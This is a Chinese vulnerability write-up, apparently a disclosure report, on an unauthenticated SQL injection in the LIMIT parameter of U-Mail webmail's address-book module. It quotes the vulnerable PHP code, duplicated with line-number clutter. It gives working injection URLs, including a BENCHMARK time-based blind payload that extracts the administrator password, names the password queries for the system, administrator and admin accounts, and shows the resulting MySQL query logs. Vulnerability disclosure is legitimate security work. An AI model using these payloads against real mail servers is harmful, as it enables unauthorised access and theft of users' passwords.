mysql limit 注入_U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录，附获取用户密码脚本)...

上次搜索只在client搜索，今天无意在fast目录下搜索了下，又发现了一处。注：client的目录下的所有函数必须登录才可以执行，fast的目录无需登录可以执行部分存在的函数，但并不能查看邮件等等。漏洞与上一个原理一样，但文件不同，此处访问权限设置不严格，可以任意用户访问，导致可以无需登录即可sql注入，limit无法使用sleep，用benchamark延时漏洞文件/fast/oab/module/operates.php代码

if ( ACTION == "member-get" )

{

$dept_id = gss( $_GET['dept_id'] );

$keyword = gss( $_GET['keyword'] );

$page = $_GET['page'] ? gss( $_GET['page'] ) : 1;

//limit

$limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//用户可控的变量

$orderby = gss( $_GET['orderby'] );

$is_reverse = gss( $_GET['is_reverse'] );

$data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );

$department_list = create_array( $data_cache, "dept_id", "name" );

$where = "";

if ( $dept_id && $dept_id != "-1" )

{

$Tree = $Department->getTreeObject( );

$Tree->set_data_cache( $data_cache );

$Tree->sort_data( -1, 1 );

$dept_ids = $Tree->get_child_id( $dept_id );

$user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );

$where = "t1.UserID IN (".$user_ids.")";

}

if ( $keyword )

{

if ( $where )

{

$where .= " AND ";

}

if ( strpos( $keyword, "@" ) )

{

$key_tmp = explode( "@", $keyword );

$keyword = $key_tmp[0];

}

$where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";

}

switch ( $orderby )

{

case "fullname" :

$orderby = "t1.FullName";

break;

case "mailbox" :

$orderby = "t1.Mailbox";

break;

case "sex" :

$orderby = "t2.sex";

break;

case "birthday" :

$orderby = "t2.birthday";

break;

case "mobile" :

$orderby = "t2.mobil";

break;

case "tel" :

$orderby = "t2.teleextension";

break;

case "position" :

$orderby = "t2.headship";

break;

case "group_num" :

$orderby = "t2.o_group";

break;

case "email" :

$orderby = "t1.Mailbox";

break;

$orderby = "";

}

$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );//进入了函数

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

if(ACTION=="member-get")

{

$dept_id=gss($_GET['dept_id']);

$keyword=gss($_GET['keyword']);

$page=$_GET['page']?gss($_GET['page']):1;

//limit

$limit=$_GET['limit']?gss($_GET['limit']):25;//用户可控的变量

$orderby=gss($_GET['orderby']);

$is_reverse=gss($_GET['is_reverse']);

$data_cache=$Department->getDepartmentByDomainID($domain_id,"dept_id,name,parent_id,`order`",0);

$department_list=create_array($data_cache,"dept_id","name");

$where="";

if($dept_id&&$dept_id!="-1")

{

$Tree=$Department->getTreeObject();

$Tree->set_data_cache($data_cache);

$Tree->sort_data(-1,1);

$dept_ids=$Tree->get_child_id($dept_id);

$user_ids=$Department->getMailboxIDByDepartmentID($dept_ids,0);

$where="t1.UserID IN (".$user_ids.")";

}

if($keyword)

{

if($where)

{

$where.=" AND ";

}

if(strpos($keyword,"@"))

{

$key_tmp=explode("@",$keyword);

$keyword=$key_tmp[0];

}

$where.="(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";

}

switch($orderby)

{

case"fullname":

$orderby="t1.FullName";

break;

case"mailbox":

$orderby="t1.Mailbox";

break;

case"sex":

$orderby="t2.sex";

break;

case"birthday":

$orderby="t2.birthday";

break;

case"mobile":

$orderby="t2.mobil";

break;

case"tel":

$orderby="t2.teleextension";

break;

case"position":

$orderby="t2.headship";

break;

case"group_num":

$orderby="t2.o_group";

break;

case"email":

$orderby="t1.Mailbox";

break;

$orderby="";

}

$arr_tmp=$Mailbox->getMailboxInfo($domain_id,$where,$page,$limit,$orderby,$is_reverse,0);//进入了函数

$limit可控，因而产生了注入，注入利用过程首先向url post数据，(注，其实该接口并非是任意登录，执行后仅可以执行仅有的几个函数，所以如果执行了有sql缺陷的函数，则产生相应了相应的无需登录的sql注入问题，如可以update密保问题则产生了获得任意用户密码的缺陷，但可访问的函数有限，并不能查看用户邮件等等)

获得认证后，执行如下http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1)发现结果如下

其执行的sql语句为

150128 21:44:43 3142 Connect[email protected] on

3142 QuerySET NAMES 'UTF8'

3142 Init DBumail

3142 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`

3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC

3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)

3142 Quit

1

2

3

4

5

6

7

8

9

10

11

12

13

15012821:44:433142Connect[email protected]on

3142QuerySETNAMES'UTF8'

3142InitDBumail

3142QuerySELECTdept_id,name,parent_id,`order`FROMoab_departmentWHEREdomain_id='1'ORDERBY`order`,`dept_id`

3142QuerySELECTt1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROMuserlistast1,mailuserinfoast2

WHEREt1.DomainID='1'ANDt1.UserID>2ANDt1.UserID=t2.UserIDANDt2.is_hidden=0

ORDERBYt1.OrderNoDESC,t1.MailboxASC

3142QuerySELECTt1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROMuserlistast1,mailuserinfoast2

WHEREt1.DomainID='1'ANDt1.UserID>2ANDt1.UserID=t2.UserIDANDt2.is_hidden=0

ORDERBYt1.OrderNoDESC,t1.MailboxASCLIMIT1,1PROCEDUREanalyse(extractvalue(rand(),concat(0x3a,version())),1)

3142Quit

由于未执行错误回显，因而我们实施盲注，代码为http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)

其sql代码为

150128 21:47:16 3144 Connect[email protected] on

3144 QuerySET NAMES 'UTF8'

3144 Init DBumail

3144 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`

3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC

3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)

1

2

3

4

5

6

7

8

9

10

11

12

15012821:47:163144Connect[email protected]on

3144QuerySETNAMES'UTF8'

3144InitDBumail

3144QuerySELECTdept_id,name,parent_id,`order`FROMoab_departmentWHEREdomain_id='1'ORDERBY`order`,`dept_id`

3144QuerySELECTt1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROMuserlistast1,mailuserinfoast2

WHEREt1.DomainID='1'ANDt1.UserID>2ANDt1.UserID=t2.UserIDANDt2.is_hidden=0

ORDERBYt1.OrderNoDESC,t1.MailboxASC

3144QuerySELECTt1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROMuserlistast1,mailuserinfoast2

WHEREt1.DomainID='1'ANDt1.UserID>2ANDt1.UserID=t2.UserIDANDt2.is_hidden=0

ORDERBYt1.OrderNoDESC,t1.MailboxASCLIMIT1,1PROCEDUREanalyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((selectpasswordfromuserlistwhereuserid=2),1,1))=97,BENCHMARK(50000000,SHA1(1)),1)))),1)

成功注入因而可以通过脚本跑不同的用户帐号和密码，管理员的#select+password+from+userlist+where+userid=2 system用户#select+password+from+web_usr+where+usr_code=1 administrator用户#select+password+from+web_usr+where+usr_code=2 admin用户普通用户的话遍历userid获取username password即可。附盲注脚本(脚本写的一半，未用二分法等，将就用)本地测试

以及官网管理登录截图